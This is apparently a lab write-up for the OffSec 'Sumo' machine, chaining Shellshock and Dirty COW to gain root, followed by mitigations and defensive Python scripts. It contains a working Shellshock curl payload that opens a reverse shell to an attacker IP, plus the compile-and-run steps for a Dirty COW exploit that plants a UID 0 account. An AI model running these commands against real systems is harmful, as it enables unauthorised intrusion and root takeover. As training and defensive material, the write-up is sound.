Sumo is a simple machine that combines two well-known CVEs into one exploit chain. The box is running an ancient Apache 2.2.22 with a CGI script sitting wide open, which makes it vulnerable to Shellshock (CVE-2014-6271) — stick a payload in the User-Agent header, get a shell as www-data. From there, the kernel is so old it practically begs for Dirty COW (CVE-2016-5195), a race condition that lets you overwrite /etc/passwd and walk straight into root. Nothing exotic here, just two old wounds that never got patched.

Attack Path: Shellshock RCE (www-data) -> Dirty COW kernel exploit (root)

Platform: OffSec Proving Grounds Play
Machine: Sumo
Difficulty: Easy
OS: Linux (Ubuntu 12.04 LTS)
Date: 2026-03-19

Table of Contents

1. Reconnaissance
   1.1  Nmap Port Scan
   1.2  Web Directory Enumeration
   1.3  CGI Script Discovery
2. Initial Access — Shellshock (CVE-2014-6271)
3. Post-Exploitation Enumeration
4. Privilege Escalation — Dirty COW (CVE-2016-5195)
5. Proof of Compromise
6. Vulnerability Summary
7. Defense & Mitigation
   7.1  Shellshock (CVE-2014-6271)
   7.2  Dirty COW (CVE-2016-5195)

1. Reconnaissance

1.1 Nmap Port Scan

nmap -Pn -A -F 192.168.198.87

Results:

Port     State  Service  Version
------   -----  -------  -----------------------------------------------
22/tcp   open   SSH      OpenSSH 5.9p1 Debian 5ubuntu1.10
80/tcp   open   HTTP     Apache httpd 2.2.22 (Ubuntu)

Only two ports open — SSH and HTTP. The Apache version banner is right there in the response headers, which immediately narrows things down. Apache 2.2.22 is from 2012 and has a long list of known issues. OS detection puts the kernel somewhere between 2.6.32 and 3.13, which is a bad sign for whoever owns this box.

1.2 Web Directory Enumeration

gobuster dir -u http://192.168.198.87 -w /usr/share/dirb/wordlists/common.txt

Results:

Path             Status  Notes
---------------  ------  ------------------------------
/cgi-bin/        403     Directory exists, access forbidden
/index.html      200     Default Apache page
/.htaccess       403     Access restricted
/server-status   403     Access restricted

/cgi-bin/ returning a 403 is the interesting part — the directory exists, Apache is just blocking directory listing. There's something in there worth finding. That's the next stop.


1.3 CGI Script Discovery

ffuf -u http://192.168.198.87/cgi-bin/FUZZ \
     -w /usr/share/wordlists/dirb/common.txt \
     -e .sh,.cgi,.pl,.py \
     -mc 200

Results:

Path                 Status  Size
-------------------  ------  --------
/cgi-bin/test        200     14 bytes
/cgi-bin/test.sh     200     14 bytes

There it is — test.sh. A shell script sitting in cgi-bin on an unpatched Apache server. At this point, Shellshock is basically confirmed before even sending the payload.


2. Initial Access — Shellshock (CVE-2014-6271)

Shellshock takes advantage of how older versions of Bash process environment variables. When a CGI script is executed, Apache passes the HTTP request headers to the shell as environment variables. If Bash is vulnerable, anything after () { :; }; in one of those headers is executed as a command — no authentication, no questions asked.

Exploit:

curl -H "User-Agent: () { :; }; echo; /bin/bash -i >& /dev/tcp/192.168.45.165/4444 0>&1" \
     http://192.168.198.87/cgi-bin/test.sh

Listener:

nc -lvnp 4444

Shell came back as www-data. Initial access done.


3. Post-Exploitation Enumeration

First thing after landing — figure out what you're working with.

uname -a
# Linux ubuntu 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 GNU/Linux
cat /etc/issue
# Ubuntu 12.04 LTS

System Info:

Property       Value
-----------    ----------------------------
Hostname       ubuntu
OS             Ubuntu 12.04 LTS
Kernel         3.2.0-23-generic (April 2012)
Architecture   x86_64
Current User   www-data

Kernel from April 2012. Dirty COW affects everything from 2.6.22 up to 3.9 — this one lands right in the middle. The only thing left to check is whether gcc is available on the box, since the exploit needs to be compiled locally.

which gcc
# /usr/bin/gcc
gcc --version
# gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3

gcc is present. We're good to go.

4. Privilege Escalation — Dirty COW (CVE-2016-5195)

Dirty COW is a race condition in the kernel's copy-on-write mechanism. The short version: an unprivileged user can win a race against the kernel's memory management and write to files they should only be able to read. The 40839.c variant abuses this to inject a new root-level entry directly into /etc/passwd.

1. Find the exploit:

searchsploit Dirty Cow

Several variants come up. 40839.c is the one that rewrites /etc/passwd — clean, reliable, works on Ubuntu 12.04.

2. Transfer to the target via wget or through the existing shell session.

3. Compile and run:

export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/4.6/
gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
./dirty

Output:

/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: password123
Complete line:
firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash
mmap: 7fb236005000
...
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'password123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

The exploit injects firefart as a new user with UID and GID both set to 0 — effectively a second root account.

4. Switch user:

su firefart
# Password: password123
id
# uid=0(firefart) gid=0(root) groups=0(root)

Root.


5. Proof of Compromise

firefart@ubuntu:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)

6. Vulnerability Summary

#   CVE              Vulnerability                        CVSS           Impact
--  ---------------  -----------------------------------  -------------  -----------------------------------------------
1   CVE-2014-6271    Shellshock — Bash CGI RCE            10.0 Critical  Unauthenticated RCE as www-data
2   CVE-2016-5195    Dirty COW — Kernel Priv Escalation   7.8 High       Local privilege escalation to root

7. Defense & Mitigation

7.1 Shellshock (CVE-2014-6271)

Root Cause: An unpatched Bash binary paired with a CGI script. Apache passes HTTP headers directly to the shell as environment variables — on a vulnerable Bash version, that's all an attacker needs.

Mitigations:

  • Patch Bash. This was fixed in Bash 4.3 patch 25, released back in 2014. There's no excuse for running an unpatched version at this point. apt-get update && apt-get upgrade bash is the starting point.
  • Kill CGI if you don't need it. Disable mod_cgi and mod_cgid entirely: a2dismod cgi cgid. If nothing relies on it, get rid of it.
  • Move away from CGI shell scripts. Replace them with FastCGI, WSGI, or a proper application framework. A .sh file in cgi-bin is a red flag in any era, let alone post-2014.
  • Put a WAF in front of it. ModSecurity with the OWASP Core Rule Set will catch Shellshock payloads in headers. It's not a substitute for patching, but it adds a layer.
  • Don't expose CGI to the internet without authentication. This endpoint had no authentication. Even a basic auth gate would have slowed things down.
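As an added defender-side example (not part of the original writeup), here is the detection logic behind the WAF and monitoring advice above, applied to the mechanism described in section 2: it scans Apache combined-format access logs for the `() {` function-definition marker in the Referer and User-Agent fields, the two header values Apache hands to a CGI script as environment variables. The log lines are constructed; the first one carries the payload shown in section 2.

```python
import re
from urllib.parse import unquote

# Constructed sample access log. Line 1 is the request from section 2 of the
# writeup; line 3 uses the Referer header instead; lines 2 and 4 are benign.
SAMPLE_LOG = r'''
192.168.45.165 - - [19/Mar/2026:10:01:02 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 14 "-" "() { :; }; echo; /bin/bash -i >& /dev/tcp/192.168.45.165/4444 0>&1"
10.0.0.5 - - [19/Mar/2026:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 177 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Mar/2026:10:02:11 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 14 "() {:;}; id" "curl/7.68.0"
10.0.0.8 - - [19/Mar/2026:10:03:00 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 403 285 "-" "Mozilla/5.0"
'''

# Apache "combined" LogFormat: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Shellshock trigger is a Bash function definition at the start of an
# environment variable value: "() {" with optional whitespace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def find_shellshock(log_text):
    """Return one finding per log line whose Referer or User-Agent carries the marker."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a production tool would count these
        req = m.group("req").split(" ")
        path = req[1] if len(req) > 1 else m.group("req")
        for field in ("referer", "ua"):
            # decode %-escapes so an encoded marker does not slip past the check
            if SHELLSHOCK_RE.search(unquote(m.group(field))):
                hits.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "field": field,
                    # a 200 means the request reached the CGI script; with
                    # mod_cgi disabled (a2dismod cgi cgid) it would not
                    "reached_cgi": m.group("status") == "200",
                })
    return hits


if __name__ == "__main__":
    for h in find_shellshock(SAMPLE_LOG):
        print(h)
```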

7.2 Dirty COW (CVE-2016-5195)

Root Cause: A race condition in mm/gup.c, specifically in get_user_pages(), that lets an unprivileged process win a write to read-only memory. Once you can write to /etc/passwd, the game is over.

Mitigations:

  • Patch the kernel. The fix landed in 4.8.3. Ubuntu 12.04 had backported patches available too — they just weren't applied here. Kernel patching needs to be treated as non-negotiable, not optional maintenance.
  • Ditch end-of-life systems. Ubuntu 12.04 went EOL in April 2017. Running it in 2026 is indefensible. Migrate to a supported release — anything currently receiving security updates.
  • Lock down critical files. chattr +i /etc/passwd /etc/shadow makes those files immutable even to root, which would have blocked this specific exploit variant. It's a compensating control, not a fix, but it buys time.
  • Remove compilers from production servers. gcc on a web server is unnecessary and dangerous. If an attacker lands a shell as www-data, the last thing you want is a ready-made toolchain waiting for them. Strip it out.
  • Harden the kernel. SELinux, AppArmor, grsecurity, or PaX all make race-condition exploits significantly harder to execute. At a minimum, AppArmor profiles for Apache should be enforced.
  • Monitor the right things. Alerts should fire on: shells spawned from www-data, any write to /etc/passwd or /etc/shadow, gcc or make invoked by non-admin users, and new UID 0 entries appearing in /etc/passwd.
  • File Integrity Monitoring. AIDE, Tripwire, or OSSEC watching /etc/passwd and /etc/shadow would have flagged the modification immediately. FIM on auth files is low-cost and high-value.
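As an added example (not part of the original writeup), a small Python audit implementing the "new UID 0 entries in /etc/passwd" check from the monitoring bullet and the baseline comparison a FIM tool performs. The passwd contents are constructed; the firefart line is the one the exploit output in section 4 shows being written.

```python
# Constructed baseline /etc/passwd (what a FIM tool or backup would hold)
# and the same file after the exploit in section 4 has appended its entry.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
"""
TAMPERED = BASELINE + "firefart:fi1IpG9ta02N.:0:0:pwned:/root:/bin/bash\n"

NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are reported, not skipped silently."""
    entries, malformed = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            malformed.append((n, line))
            continue
        entries.append({"name": f[0], "pw": f[1], "uid": int(f[2]),
                        "gid": int(f[3]), "home": f[5], "shell": f[6]})
    return entries, malformed


def audit_passwd(text, baseline=None):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    entries, malformed = parse_passwd(text)
    findings = [f"line {n}: malformed entry" for n, _ in malformed]
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 account other than root")
        # a real hash in field 2 bypasses /etc/shadow, exactly what the exploit does
        if e["pw"] not in ("", "x", "*", "!"):
            findings.append(f"{e['name']}: password hash stored in passwd instead of shadow")
        if e["pw"] == "" and e["shell"] not in NOLOGIN_SHELLS:
            findings.append(f"{e['name']}: empty password with login shell")
    names = [e["name"] for e in entries]
    for dup in sorted({n for n in names if names.count(n) > 1}):
        findings.append(f"{dup}: duplicate username")
    if baseline is not None:
        known = {e["name"] for e in parse_passwd(baseline)[0]}
        findings += [f"{e['name']}: not present in baseline copy"
                     for e in entries if e["name"] not in known]
    return findings


if __name__ == "__main__":
    print("\n".join(audit_passwd(TAMPERED, BASELINE)) or "clean")
```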

OffSec PG Play — for educational purposes only.